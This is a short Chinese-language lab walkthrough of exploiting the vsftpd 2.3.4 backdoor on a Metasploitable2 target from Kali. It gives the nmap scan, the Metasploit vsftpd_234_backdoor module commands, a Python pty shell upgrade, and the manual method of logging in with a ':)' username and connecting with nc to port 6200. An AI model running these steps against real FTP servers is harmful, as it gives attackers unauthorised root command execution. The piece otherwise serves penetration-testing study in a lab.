漏洞概要
在vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令
漏洞利用
攻击机:kali 2022 msfconsole利用或者nc连接后门端口利用
靶机: Metasploitable2-Linux,这是一个集成了很多漏洞的平台
msfconsole利用
首先使用nmap进行目标版本服务进行扫描
靶机IP为:172.16.1.104
nmap -sV -p- -n 172.16.1.104
开启msfconsole利用平台进行漏洞利用
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.1.104
run
漏洞利用成功,再利用成功后我们终端显示的非常难受,可以执行python命令获取一个虚拟终端
python -c "import pty;pty.spawn('/bin/sh')"
ftp直接连接服务,nc连接6200后门端口
使用ftp 172.16.1.104连接靶机,用户名输入任意用户名加:),例如root:)
密码随便输入
打开一个终端使用nc进行连接
nc 172.16.1.104 6200
漏洞利用成功